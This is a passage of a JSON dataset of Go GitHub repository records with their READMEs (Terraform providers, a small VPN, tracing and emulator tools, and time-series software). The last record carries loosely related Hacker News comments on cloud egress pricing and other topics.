AUTHOR\n\n[@DQNEO](https://twitter.com/DQNEO)\n\n# LICENSE\n\nMIT License\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hashicorp/terraform-provider-kubernetes-alpha", "link": "https://github.com/hashicorp/terraform-provider-kubernetes-alpha", "tags": ["terraform", "kubernetes", "infrastructure-as-code"], "stars": 506, "description": "A Terraform provider for Kubernetes that uses dynamic resource types and server-side apply. Supports all Kubernetes resources.", "lang": "Go", "repo_lang": "", "readme": "# \u26a0\ufe0f Archived\n\nThis repository was experimental and is now archived. The `kubernetes_manifest` resource and associated issues has been moved to the repository for the official [Terraform Provider for Kubernetes](https://github.com/hashicorp/terraform-provider-kubernetes). While the kubernetes-alpha provider will continue to be downloadable from the Terraform Registry up to the last version released, we recommend migrating your configurations to use the `kubernetes_manifest` resource in our official Terraform provider. For further details, take a look at our [blog post](https://www.hashicorp.com/blog/beta-support-for-crds-in-the-terraform-provider-for-kubernetes) announcing this change.\n\n\n# Kubernetes provider for Terraform (alpha) \n\n \"Terraform\n\n\n\n![Status: Experimental](https://img.shields.io/badge/status-experimental-EAAA32) [![Releases](https://img.shields.io/github/release/hashicorp/terraform-provider-kubernetes-alpha.svg)](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/releases)\n[![LICENSE](https://img.shields.io/github/license/hashicorp/terraform-provider-kubernetes-alpha.svg)](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/LICENSE)\n![unit tests](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/workflows/unit%20tests/badge.svg)\n![acceptance tests](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/workflows/acceptance%20tests/badge.svg)\n\nThis Kubernetes provider for Terraform (alpha) supports all API resources in a generic fashion.\n\nThis provider allows you to describe any Kubernetes resource using HCL. See [Moving from YAML to HCL](#moving-from-yaml-to-hcl) if you have YAML you want to use with the provider.\n\nPlease regard this project as experimental. It still requires extensive testing and polishing to mature into production-ready quality. At this time, we are not planning to create a migration path for resources created with the kubernetes-alpha provider when the `manifest` resource is merged into the official kubernetes provider. For this reason, please do not rely on this provider for production use while we strive towards project maturity. Please [file issues](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/issues/new/choose) generously and detail your experience while using the provider. We welcome your feedback.\n\nOur eventual goal is for this generic resource to become a part of our [official Kubernetes provider](https://github.com/hashicorp/terraform-provider-kubernetes) once it is supported by the Terraform Plugin SDK. However, this work is subject to signficant changes as we iterate towards that level of quality.\n\n## Requirements\n\n* [Terraform](https://www.terraform.io/downloads.html) version 0.14.8 +\n* [Kubernetes](https://kubernetes.io/docs/reference) version 1.17.x +\n* [Go](https://golang.org/doc/install) version 1.14.x\n\n## Getting Started\n\nIf this is your first time here, you can get an overview of the provider by reading our [introductory blog post](https://www.hashicorp.com/blog/deploy-any-resource-with-the-new-kubernetes-provider-for-hashicorp-terraform/).\n\nOtherwise, start by installing the latest release from the [Terraform registry](https://registry.terraform.io/providers/hashicorp/kubernetes-alpha/latest).\n\nOnce you have the plugin installed, review the [usage document](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/docs/usage.md) in the [docs](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/docs/) folder to understand which configuration options are available. You can find the following examples and more in [our examples folder](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/examples/). Don't forget to run `terraform init` in your Terraform configuration directory to allow Terraform to detect the provider plugin.\n\n### Create a Kubernetes ConfigMap\n```hcl\nprovider \"kubernetes-alpha\" {\n config_path = \"~/.kube/config\" // path to kubeconfig\n}\n\nresource \"kubernetes_manifest\" \"test-configmap\" {\n provider = kubernetes-alpha\n\n manifest = {\n \"apiVersion\" = \"v1\"\n \"kind\" = \"ConfigMap\"\n \"metadata\" = {\n \"name\" = \"test-config\"\n \"namespace\" = \"default\"\n }\n \"data\" = {\n \"foo\" = \"bar\"\n }\n }\n}\n```\n\n### Create a Kubernetes Custom Resource Definition\n\n```hcl\nprovider \"kubernetes-alpha\" {\n config_path = \"~/.kube/config\" // path to kubeconfig\n}\n\nresource \"kubernetes_manifest\" \"test-crd\" {\n provider = kubernetes-alpha\n\n manifest = {\n apiVersion = \"apiextensions.k8s.io/v1\"\n kind = \"CustomResourceDefinition\"\n metadata = {\n name = \"testcrds.hashicorp.com\"\n }\n spec = {\n group = \"hashicorp.com\"\n names = {\n kind = \"TestCrd\"\n plural = \"testcrds\"\n }\n scope = \"Namespaced\"\n versions = [{\n name = \"v1\"\n served = true\n storage = true\n schema = {\n openAPIV3Schema = {\n type = \"object\"\n properties = {\n data = {\n type = \"string\"\n }\n refs = {\n type = \"number\"\n }\n }\n }\n }\n }]\n }\n }\n}\n```\n\n## Using `wait_for` to block create and update calls\n\nThe `kubernetes_manifest` resource supports the ability to block create and update calls until a field is set or has a particular value by specifying the `wait_for` attribute. This is useful for when you create resources like Jobs and Services when you want to wait for something to happen after the resource is created by the API server before Terraform should consider the resource created.\n\n`wait_for` currently supports a `fields` attribute which allows you specify a map of fields paths to regular expressions. You can also specify `*` if you just want to wait for a field to have any value.\n\n```hcl\nresource \"kubernetes_manifest\" \"test\" {\n provider = kubernetes-alpha\n\n manifest = {\n // ...\n }\n\n wait_for = {\n fields = {\n # Check the phase of a pod\n \"status.phase\" = \"Running\"\n\n # Check a container's status\n \"status.containerStatuses[0].ready\" = \"true\",\n\n # Check an ingress has an IP\n \"status.loadBalancer.ingress[0].ip\" = \"^(\\\\d+(\\\\.|$)){4}\"\n\n # Check the replica count of a Deployment\n \"status.readyReplicas\" = \"2\"\n\n # Check for an annotation\n \"metadata.annotations[\\\"test.annotation\\\"]\" = \"*\"\n }\n }\n}\n\n```\n\n## Moving from YAML to HCL\n\nThe `manifest` attribute of the `kubernetes_manifest` resource accepts any arbitrary Kubernetes API object, using Terraform's [map](https://www.terraform.io/docs/configuration/expressions.html#map) syntax. If you have YAML you want to use with this provider, we recommend that you convert it to a map as an initial step and then manage that resource in Terraform, rather than using `yamldecode()` inside the resource block. \n\nYou can quickly convert a single YAML file to an HCL map using this one liner:\n\n```\necho 'yamldecode(file(\"test.yaml\"))' | terraform console\n```\n\nAlternatively, there is also an experimental command line tool [tfk8s](https://github.com/jrhouston/tfk8s) you could use to convert Kubernetes YAML manifests into complete Terraform configurations.\n\n## Contributing\n\nWe welcome your contribution. Please understand that the experimental nature of this repository means that contributing code may be a bit of a moving target. If you have an idea for an enhancement or bug fix, and want to take on the work yourself, please first [create an issue](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/issues/new/choose) so that we can discuss the implementation with you before you proceed with the work.\n\nYou can review our [contribution guide](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/_about/CONTRIBUTING.md) to begin. You can also check out our [frequently asked questions](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/_about/FAQ.md).\n\n## Experimental Status\n\nBy using the software in this repository (the \"Software\"), you acknowledge that: (1) the Software is still in development, may change, and has not been released as a commercial product by HashiCorp and is not currently supported in any way by HashiCorp; (2) the Software is provided on an \"as-is\" basis, and may include bugs, errors, or other issues; (3) the Software is NOT INTENDED FOR PRODUCTION USE, use of the Software may result in unexpected results, loss of data, or other unexpected results, and HashiCorp disclaims any and all liability resulting from use of the Software; and (4) HashiCorp reserves all rights to make all decisions about the features, functionality and commercial release (or non-release) of the Software, at any time and without any obligation or liability whatsoever.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kanocz/lcvpn", "link": "https://github.com/kanocz/lcvpn", "tags": ["golang", "vpn"], "stars": 506, "description": "Decentralized VPN in golang", "lang": "Go", "repo_lang": "", "readme": "# LCVPN - Light decentralized VPN in golang\n\nOriginally this repo was just an answer on a question \"how much time it'll take to write my own simple VPN in golang\" (answer is about 3 hours for first prototype), but now it used in production in different environments.\n\nSo, LCVPN is\n - Very light and easy (one similar config on all hosts)\n - Use same config for all hosts (autedetect local params) - useful with puppet etc\n - Uses AES-128, AES-192 or AES-256 encryption (note that AES-256 is **much slower** than AES-128 on most computers) + optional HMAC-SHA256 or (super secure! \ud83d\ude05 ) NONE encryption (just copy without modification)\n - Communicates via UDP directly to selected host (no central server)\n - Works only on Linux (uses TUN device)\n - Support of basic routing - can be used to connect several networks\n - Multithread send and receive - scaleable for big traffc\n - Due to use so_reuseport better result in case of bigger number of hosts\n - It's still in beta stage, use it on your own risk (and please use only versions marked as \"release\")\n\n![alt tag](https://raw.githubusercontent.com/kanocz/lcvpn/master/topology.png)\n\n### Install and run\n\nYou need golang (at least 1.5) installed and configured:\n\n```sh\n$ go get -u github.com/kanocz/lcvpn\n```\n\nif you have config in /etc/lcvpn.conf\n\n```sh\n$ sudo $GOPATH/bin/lcvpn\n```\n\nif you want to specify different location of config (or if you need to run several instances)\n\n```sh\n$ sudo $GOPATH/bin/lcvpn -config lcvpn.conf\n```\nif you host is hidden behind firewall (with udp port forward) lcvpn is unable to detect\nwhich \"remote\" is localhost. In this case use next syntax:\n\n```sh\n$ sudo $GOPATH/bin/lcvpn -local berlin -config lcvpn.conf\n```\n\n\n### Config example\n\n```\n[main]\nport = 23456\nencryption = aescbc\nmainkey = 4A34E352D7C32FC42F1CEB0CAA54D40E9D1EEDAF14EBCBCECA429E1B2EF72D21\naltkey = 1111111117C32FC42F1CEB0CAA54D40E9D1EEDAF14EBCBCECA429E1B2EF72D21\nbroadcast = 192.168.3.255\nnetcidr = 24\nrecvThreads = 4\nsendThreads = 4\n\n[remote \"prague\"]\nExtIP = 46.234.105.229\nLocIP = 192.168.3.15\nroute = 192.168.10.0/24\nroute = 192.168.15.0/24\nroute = 192.168.20.0/24\n\n[remote \"berlin\"]\nExtIP = 103.224.182.245\nLocIP = 192.168.3.8\nroute = 192.168.11.0/24\n\n[remote \"kiev\"]\nExtIP = 95.168.211.37\nLocIP = 192.168.3.3\n```\n\nwhere port is UDP port for communication \nencryption is *aescbc* for AES-CBC, *aescbchmac* for AES-CBC+HMAC-SHA245 or *none* for no encryption \nfor *aescbc* mainkey/altkey is hex form of 16, 24 or 32 bytes key (for AES-128, AES-192 or AES-256) \nfor *aescbchmac* mainkey/altkey is 32 bytes longer\nfor *none* mainkey/altkey mainkey/altkey is just ignored\nnumber of remotes is virtualy unlimited, each takes about 256 bytes in memory \n\n### Config reload\n\nConfig is reloaded on HUP signal. In case of invalid config just log message will appeared, previous one is used. \nP.S.: listening udp socket is not reopened for now, so on port change restart is needed\n\n### Online key change\n\n**altkey** configuration option allows specify alternative encryption key that will be used in case if decription with primary\none failed. This allow to use next algoritm to change keys without link going offline:\n - In normal state only **mainkey** is set (setting altkey is more cpu-consuming)\n - Set altkey to new key on all hosts and send HUP signal\n - Exchange altkey and aeskey on all hosts and send HUP signal\n - Remove altkey (with old key) from configs on all hosts and send HUP signal again\n - We are running with new key :)\n\n### Roadmap\n\n* 100% unit test coverage\n* please let me know if you need anything more\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cloudflare/ahocorasick", "link": "https://github.com/cloudflare/ahocorasick", "tags": [], "stars": 506, "description": "A Golang implementation of the Aho-Corasick string matching algorithm", "lang": "Go", "repo_lang": "", "readme": "ahocorasick\n===========\n\nA Golang implementation of the Aho-Corasick string matching algorithm\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "openzipkin-contrib/zipkin-go-opentracing", "link": "https://github.com/openzipkin-contrib/zipkin-go-opentracing", "tags": ["zipkin", "instrumentation", "go", "opentracing", "tracing", "trace", "distributed-tracing", "openzipkin"], "stars": 505, "description": "OpenTracing Bridge for Zipkin Go", "lang": "Go", "repo_lang": "", "readme": "# zipkin-go-opentracing\n\n[![Travis CI](https://travis-ci.org/openzipkin-contrib/zipkin-go-opentracing.svg?branch=master)](https://travis-ci.org/openzipkin-contrib/zipkin-go-opentracing)\n[![GoDoc](https://godoc.org/github.com/openzipkin-contrib/zipkin-go-opentracing?status.svg)](https://godoc.org/github.com/openzipkin-contrib/zipkin-go-opentracing)\n[![Go Report Card](https://goreportcard.com/badge/github.com/openzipkin-contrib/zipkin-go-opentracing)](https://goreportcard.com/report/github.com/openzipkin-contrib/zipkin-go-opentracing)\n[![Sourcegraph](https://sourcegraph.com/github.com/openzipkin-contrib/zipkin-go-opentracing/-/badge.svg)](https://sourcegraph.com/github.com/openzipkin-contrib/zipkin-go-opentracing?badge)\n\n[OpenTracing](http://opentracing.io) bridge for the native [Zipkin](https://zipkin.io) tracing implementation [Zipkin Go](https://github.com/openzipkin/zipkin-go).\n\n### Notes\n\nThis package is a simple bridge to allow OpenTracing API consumers\nto use Zipkin as their tracing backend. For details on how to work with spans\nand traces we suggest looking at the documentation and README from the\n[OpenTracing API](https://github.com/opentracing/opentracing-go).\n\nFor developers interested in adding Zipkin tracing to their Go services we\nsuggest looking at [Go kit](https://gokit.io) which is an excellent toolkit to\ninstrument your distributed system with Zipkin and much more with clean\nseparation of domains like transport, middleware / instrumentation and\nbusiness logic.\n\n### Examples\n\nPlease check the [zipkin-go](https://github.com/openzipkin/zipkin-go) package for information how to set-up the Zipkin Go native tracer. Once set-up you can simple call the `Wrap` function to create the OpenTracing compatible bridge.\n\n```go\nimport (\n\t\"github.com/opentracing/opentracing-go\"\n\t\"github.com/openzipkin/zipkin-go\"\n\tzipkinhttp \"github.com/openzipkin/zipkin-go/reporter/http\"\n\tzipkinot \"github.com/openzipkin-contrib/zipkin-go-opentracing\"\n)\n\nfunc main() {\n\t// bootstrap your app...\n \n\t// zipkin / opentracing specific stuff\n\t{\n\t\t// set up a span reporter\n\t\treporter := zipkinhttp.NewReporter(\"http://zipkinhost:9411/api/v2/spans\")\n\t\tdefer reporter.Close()\n \n\t\t// create our local service endpoint\n\t\tendpoint, err := zipkin.NewEndpoint(\"myService\", \"myservice.mydomain.com:80\")\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to create local endpoint: %+v\\n\", err)\n\t\t}\n\n\t\t// initialize our tracer\n\t\tnativeTracer, err := zipkin.NewTracer(reporter, zipkin.WithLocalEndpoint(endpoint))\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to create tracer: %+v\\n\", err)\n\t\t}\n\n\t\t// use zipkin-go-opentracing to wrap our tracer\n\t\ttracer := zipkinot.Wrap(nativeTracer)\n \n\t\t// optionally set as Global OpenTracing tracer instance\n\t\topentracing.SetGlobalTracer(tracer)\n\t}\n \n\t// do other bootstrapping stuff...\n}\n```\n\nFor more information on zipkin-go-opentracing, please see the documentation at\n[go doc](https://godoc.org/github.com/openzipkin-contrib/zipkin-go-opentracing).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "aliyun/terraform-provider-alicloud", "link": "https://github.com/aliyun/terraform-provider-alicloud", "tags": ["terraform", "terraform-provider", "alicloud"], "stars": 505, "description": "Terraform AliCloud provider", "lang": "Go", "repo_lang": "", "readme": "Terraform Provider For Alibaba Cloud\n==================\n\n- Website: https://www.terraform.io\n- [![Gitter chat](https://badges.gitter.im/hashicorp-terraform/Lobby.png)](https://gitter.im/hashicorp-terraform/Lobby)\n- Mailing list: [Google Groups](http://groups.google.com/group/terraform-tool)\n\n \n\n\n\n\n\nSupported Versions\n------------------\n\n| Terraform version | minimum provider version |maxmimum provider version\n| ---- | ---- | ----| \n| >= 0.11.x\t| 1.0.0\t| latest |\n\nRequirements\n------------\n\n-\t[Terraform](https://www.terraform.io/downloads.html) 0.12.x\n-\t[Go](https://golang.org/doc/install) 1.13 (to build the provider plugin)\n- [goimports](https://godoc.org/golang.org/x/tools/cmd/goimports):\n ```\n go get golang.org/x/tools/cmd/goimports\n ```\n\nBuilding The Provider\n---------------------\n\nClone repository to: `$GOPATH/src/github.com/aliyun/terraform-provider-alicloud`\n\n```sh\n$ mkdir -p $GOPATH/src/github.com/aliyun; cd $GOPATH/src/github.com/aliyun\n$ git clone git@github.com:aliyun/terraform-provider-alicloud\n```\n\nEnter the provider directory and build the provider\n\n```sh\n$ cd $GOPATH/src/github.com/aliyun/terraform-provider-alicloud\n$ make build\n```\n\nUsing the provider\n----------------------\n## Fill in for each provider\n\nDeveloping the Provider\n---------------------------\n\nIf you wish to work on the provider, you'll first need [Go](http://www.golang.org) installed on your machine (version 1.11+ is *required*). You'll also need to correctly setup a [GOPATH](http://golang.org/doc/code.html#GOPATH), as well as adding `$GOPATH/bin` to your `$PATH`.\n\nTo compile the provider, run `make build`. This will build the provider and put the provider binary in the `$GOPATH/bin` directory.\n\n```sh\n$ make build\n...\n$ $GOPATH/bin/terraform-provider-alicloud\n...\n```\n\nRunning `make dev` or `make devlinux` or `devwin` will only build the specified developing provider which matchs the local system.\nAnd then, it will unarchive the provider binary and then replace the local provider plugin.\n\nIn order to test the provider, you can simply run `make test`.\n\n```sh\n$ make test\n```\n\nIn order to run the full suite of Acceptance tests, run `make testacc`.\n\n*Note:* Acceptance tests create real resources, and often cost money to run.\n\n```sh\n$ make testacc\n```\n\n## Acceptance Testing\nBefore making a release, the resources and data sources are tested automatically with acceptance tests (the tests are located in the alicloud/*_test.go files).\nYou can run them by entering the following instructions in a terminal:\n```\ncd $GOPATH/src/github.com/aliyun/terraform-provider-alicloud\nexport ALICLOUD_ACCESS_KEY=xxx\nexport ALICLOUD_SECRET_KEY=xxx\nexport ALICLOUD_REGION=xxx\nexport ALICLOUD_ACCOUNT_ID=xxx\nexport ALICLOUD_RESOURCE_GROUP_ID=xxx\nexport outfile=gotest.out\nTF_ACC=1 TF_LOG=INFO go test ./alicloud -v -run=TestAccAlicloud -timeout=1440m | tee $outfile\ngo2xunit -input $outfile -output $GOPATH/tests.xml\n```\n\n-> **Note:** The last line is optional, it allows to convert test results into a XML format compatible with xUnit.\n\n\n-> **Note:** Most test cases will create PostPaid resources when running above test command. However, currently not all\n account site type support create PostPaid resources, so you need set your account site type before running the command:\n```\n# If your account belongs to domestic site\nexport ALICLOUD_ACCOUNT_SITE=Domestic\n\n# If your account belongs to international site\nexport ALICLOUD_ACCOUNT_SITE=International\n```\nThe setting of acount site type can skip some unsupported cases automatically.\n\n-> **Note:** At present, there is missing CMS contact group resource and please create manually a contact group by web console and set it by environment variable `ALICLOUD_CMS_CONTACT_GROUP`, like:\n ```\n export ALICLOUD_CMS_CONTACT_GROUP=tf-testAccCms\n ```\n Otherwise, all of resource `alicloud_cms_alarm's` test cases will be skipped.\n\n## Refer\n\nAlibaba Cloud Provider [Official Docs](https://www.terraform.io/docs/providers/alicloud/index.html)\nAlibaba Cloud Provider Modules [Official Modules](https://registry.terraform.io/browse?provider=alicloud)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "libretro/ludo", "link": "https://github.com/libretro/ludo", "tags": ["libretro", "libretro-frontend", "libretro-api", "golang", "glfw", "bindings", "emulation", "opengl", "retrogaming", "ui", "openal"], "stars": 504, "description": "A libretro frontend written in golang", "lang": "Go", "repo_lang": "", "readme": "# ludo ![Build Status](https://github.com/libretro/ludo/workflows/CI/badge.svg) [![GoDoc](https://godoc.org/github.com/libretro/ludo?status.svg)](https://godoc.org/github.com/libretro/ludo)\n\nLudo is a work in progress libretro frontend written in go.\n\n\n\nIt is able to launch most non GL libretro cores.\n\nIt works on OSX, Linux, Linux ARM and Windows. You can download releases [here](https://github.com/libretro/ludo/releases)\n\n## Dependencies\n\n- GLFW 3.3\n- OpenGL >= 2.1\n- OpenAL\n\n#### On OSX\n\nYou can execute the following command and follow the instructions about exporting PKG_CONFIG\n\n brew install openal-soft\n\n#### On Debian or Ubuntu\n\n sudo apt-get install libopenal-dev xorg-dev golang\n\n#### On Raspbian\n\nYou need to enable the experimental VC4 OpenGL support (Full KMS) in raspi-config.\n\n sudo apt-get install libopenal-dev xorg-dev\n\n#### On Alpine / postmarketOS\n\n sudo apk add musl-dev gcc openal-soft-dev libx11-dev libxcursor-dev libxrandr-dev libxinerama-dev libxi-dev mesa-dev\n\n#### On Windows\n\nSetup openal headers and dll in mingw-w64 `include` and `lib` folders.\n\n## Building\n\n git clone --recursive https://github.com/libretro/ludo.git\n cd ludo\n go build\n\nFor more detailed build steps, please refer to [our continuous delivery config](https://github.com/libretro/ludo/blob/master/.github/workflows/cd.yml).\n\n## Running\n\n ./ludo\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eatonphil/dbcore", "link": "https://github.com/eatonphil/dbcore", "tags": [], "stars": 505, "description": "Generate applications powered by your database.", "lang": "Go", "repo_lang": "", "readme": "# DBCore (ALPHA)\n\nDBCore is a code generator build around database schemas and an API\nspecification. Included with DBCore are templates for generating a Go\nREST API and React UI.\n\n## Features and API specification\n\nWhile the DBCore project can build any templates from your\ndatabase. It also defines an API specification with useful\nfunctionality for rapidly standing up an API around your database.\n\nBecause DBCore does code generation, it can build well-typed code. The\nbuilt-in Go API templates are a great example of this.\n\nBut since the API specification is language-agnostic, all these\nfeatures are supported no matter what language you use to generate a\nDBCore API.\n\nMajor features include:\n\n* Get one, get many, create, edit, delete endpoints\n* Filtering, sorting, pagination\n* JWT-based authentication, per-endpoint/method SQL filter-based authorization\n\nUpcoming features include:\n\n* Lua-based hooks and transformations\n* SSO integration\n\n[See the docs site for more detail.](https://www.dbcore.org)\n\n## Example\n\n![Screenshot of list view with pagination](docs/screenshot.png)\n\nThere's a built-in notes application with non-trivial\nauthorization. Users belong to an org. Notes belong to a user. Notes\nthat are marked public don't need a session. Otherwise they can only\nbe viewed by other users within the same org. Only org admins or the\nnotes creator can modify a note.\n\n```bash\n$ git clone git@github.com:eatonphil/dbcore\n$ cd dbcore\n$ make example-notes\n$ cd ./examples/notes/api\n$ ./main\nINFO[0000] Starting server at :9090 pkg=server struct=Server\n... in a new window ...\n$ curl -X POST -d '{\"username\": \"alex\", \"password\": \"alex\", \"name\": \"Alex\"}' localhost:9090/users/new\n{\"id\":1,\"username\":\"alex\",\"password\":\"alex\",\"name\":\"Alex\"}\n$ curl 'localhost:9090/users?limit=25&offset=0&sortColumn=id&sortOrder=desc' | jq\n{\n \"total\": 1,\n \"data\": [\n {\n \"id\": 1,\n \"username\": \"alex\",\n \"password\": \"alex\",\n \"name\": \"Alex\"\n },\n ]\n}\n```\n\nAnd to build the UI:\n\n```\n$ cd examples/notes/browser\n$ yarn start\n```\n\nLog in with any of the following credentials:\n\n* admin:admin (Org 1)\n* notes-admin:admin (Org 2)\n* editor:editor (Org 2)\n\n## Dependencies\n\n* Go\n* PostgreSQL, MySQL or SQLite3\n* .NET Core\n\n## Restrictions\n\nThere are a bunch of restrictions! Here are a few known ones. You will\ndiscover more and you may fix them!\n\n* Only tables supported (i.e. no views)\n* Only single-column foreign keys supported\n* Only Go API, React UI templates provided\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tgres/tgres", "link": "https://github.com/tgres/tgres", "tags": ["time-series", "postgresql-database", "statsd", "grafana", "graphite", "go", "golang"], "stars": 505, "description": "Time Series in Go and PostgreSQL", "lang": "Go", "repo_lang": "", "readme": "\nTgres is a program comprised of several packages which together can be\nused to receive, store and present time-series data using a relational\ndatabase as persistent storage (currently only PostgreSQL).\n\nYou can currently use the standalone Tgres daemon as Graphite-like API\nand Statsd replacement all-in-one, or you can use the Tgres packages\nto incorporate time series collection and reporting functionality into\nyour application.\n\nSee [GoDoc](https://godoc.org/github.com/tgres/tgres) for package\ndetails.\n\nWhether you use standalone Tgres or as a package, the time series data\nwill appear in your database in a compact and efficient format (by\ndefault as a view called `tv`), while at the same time simple to\nprocess using any other tool, language, or framework because it is\njust a table (or a view, rather). For a more detailed description of\nhow Tgres stores data see this\n[article](https://grisha.org/blog/2017/01/21/storing-time-seris-in-postgresql-optimize-for-write/)\n\n### Current Status\n\nFeb 7 2018: This project is not actively maintained. You may find\nquite a bit of time-series wisdom here, but there are probably still a\nlot of bugs.\n\nJul 5 2017: See this [status update](https://grisha.org/blog/2017/07/04/tgres-status-july-2017/)\n\nJun 15 2017: Many big changes since March, most notably data point\nversioning and instoduction of ds_state and rra_state tables which\ncontain frequently changed attributes as arrays, similar to the way\ndata points are stored eliminating the need to update ds and rra\ntables, these are now essentially immutable. Ability to delete series\nwith NOTIFY to Tgres to purge it from the cache.\n\nMar 22 2017: Version 0.10.0b was tagged. This is our first beta (which\nis more stable than alpha). Please try it out, and take a minute to\nopen an issue or even a PR if you see/fix any problems. Your feedback\nis most appreciated!\n\nFeb 2017 Note: A major change in the database structure has been made,\nTgres now uses the \"write optimized\" / \"vertical\" storage. This change\naffected most of the internal code, and as far overall status, it set\nus back a bit, all tests are currently broken, but on the bright side,\nwrite performance is amazing now.\n\nPhase 1 or proof-of-concept for the project is the ability to (mostly)\nact as a drop-in replacement for Graphite (except for chart\ngeneration) and Statsd. Currently Tgres supports nearly all of\nGraphite functions.\n\nAs of Aug 2016 Tgres is feature-complete for phase 1, which means that\nthe development will focus on tests, documentation and stability for a\nwhile.\n\nTgres is not ready for production use, but is definitely stable enough\nfor tinkering for those interested.\n\n### Getting Started\n\nYou need a newer Go (1.7+) and PostgreSQL 9.5 or later. To get the\ndaemon compiled all you need is:\n\n```\n$ go get github.com/tgres/tgres\n```\n\nNow you should have a tgres binary in `$GOPATH/bin`.\n\nThere is also a Makefile which lets you build Tgres with `make` which\nwill use a slightly more elaborate command and the resulting tgres\nbinary will be able to report its build time and git revision, but\notherwise it's the same.\n\nLook in `$GOPATH/src/github.com/tgres/tgres/etc` for a sample config\nfile. Make a copy of this file and edit it, at the very least check\nthe `db-connect-string` setting. Also check `log-file` directory, it\nmust be writable.\n\nThe user of the PostgreSQL database needs CREATE TABLE permissions. On\nfirst run tgres will create three tables (ds, rra and ts) and two\nviews (tv and tvd).\n\nTgres is invoked like this:\n```\n$ $GOPATH/bin/tgres -c /path/to/config\n```\n\n### For Developers\n\nThere is nothing specific you need to know. If you'd like to submit a\nbug fix, or for anything else - use Github.\n\n### Migrating Graphite Data\n\nIncluded in cmd/whisper_import is a program that can copy whisper data\ninto Tgres, its command-line arguments are self-explanatory. You\nshould be able to start sending data to Tgres and then migrate your\nGraphite data retroactively by running whisper_import to avoid gaps in\ndata. It's probably a good idea to test a small subset of series first,\nmigrations can be time consuming and resource-intensive.\n", "readme_type": "markdown", "hn_comments": "I think Cloudflare has been successful somewhat at making AWS improve transfer pricing.Cheap data transfer attracts trouble, however. 10 cents a gigabyte is much cheaper than buying a CD or DVD, but pirates like to pirate 10x or 100x more than they could ever buy so I think it slows people down.Circa 2000 when Napster and Limewire were big, Cornell University dealt with it by putting a usage cap on undergraduate IPs and charging for data over the cap. There are some kids who will have their parents pay a few $1000 of parking tickets and data transfer a semester on their bursar bill but it sure slowed the others down.Egress pricing is crazy, but I don't know that it's anti-competitive? I don't think it fits the definition of tying, because you egress isn't unrelated to the other services.There's certainly a lot of margin in their egress pricing, and that may allow them to operate portions of their service with smaller margins, and maybe that's anti-competitive, but it's not like any of their services are low cost, so I don't think there's really a case that they're dumping and using bandwidth to cover it. Everything is expensive. There's no law against that.If you have enough egress, and you can't negotiate better pricing (which is an option!), you should probably consider AWS direct connect (or similar) and send your egress out through cheaper transit elsewhere.The bandwidth alliance (https://www.cloudflare.com/bandwidth-alliance/) seems to be trying to do something about this, and build an ecosystem of companies that don't charge for egress to others. Presumably this is backed by legitimate open peering in internet exchanges, rather than metered links.I believe there are some challengers in this group like backblaze, wasabi, oracle cloud etc.Data-driven predictions of the time remaining until critical global warming thresholds are reachedhttps://www.pnas.org/doi/10.1073/pnas.2207183120If another asteroid hits the earth on the scale of the Chicxulub Event, wonder how that would affect the model.Does JSXGraph have this behavior?Maybe you can \"fake\" render the canvas, but what happens to the actual plot graph? Do you see fp artifacts there?eventually bandaid-ed it by preventing further zooming based on current precision zoom = {\n fac ctr min max -> newMin newMax\n newMin = \n | eps < 2^(-2^11) = min\n | eps > 2^( 2^11) = min\n | avg/eps > 2^52 = min\n | otherwise = (min-ctr)*fac + ctr\n newMax =\n | eps < 2^(-2^11) = max\n | eps > 2^( 2^11) = max\n | avg/eps > 2^25 = max\n | otherwise = (max-ctr)*fac + ctr\n avg = (max+min)/2\n eps = (max-min)/2\n }I don't have an answer to which VPS providers still have the feature to disable a VM at a certain bw usage. The only thing I can add is that this behavior can be accomplished on any node running Linux by using one of the bandwidth related modules such as quota. [1] One advantage of using IPTables to do this is that one can enforce it on any or multiple ports [2] but exclude your management ports such as SSHD. The next matching rule could be a tcp-reset only responding to your automation so that it knows to take that node out of any pools one has defined.[1] - https://ipset.netfilter.org/iptables-extensions.man.html#lbB...[2] - https://ipset.netfilter.org/iptables-extensions.man.html#lbB...The only reason I stick with scaleway. No direct data charges.> Because most electric motors deliver enormous torque more aggressively and instantaneously than most combustion engines, they send a more significant shock to the tire than nearly any ICE car with a similar design brief canThe part I don\u2019t get is that, couldn\u2019t the manufacturer change the motor controller to hold back torque when accelerating? It would seem that life cycle costs could be reduced with a design change in software or firmware.Aside from initial purchase price, more expensive tires are the other thing working against total lifetime cost of EV's vs ICE vehicles. More than offset by all the other savings on gas, maintenance, repairs, moving part replacements, fluids, brakes, time wasted stopping at gas stations, etc.So what happens when you apply the brakes? Don't similar displacement forces occur to the tires? Are they saying that it doesn't apply here for non-EV vehicles?- heavier- higher torque- tire noise more noticable without engine nose- want lower rolling resistance for efficiency", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": 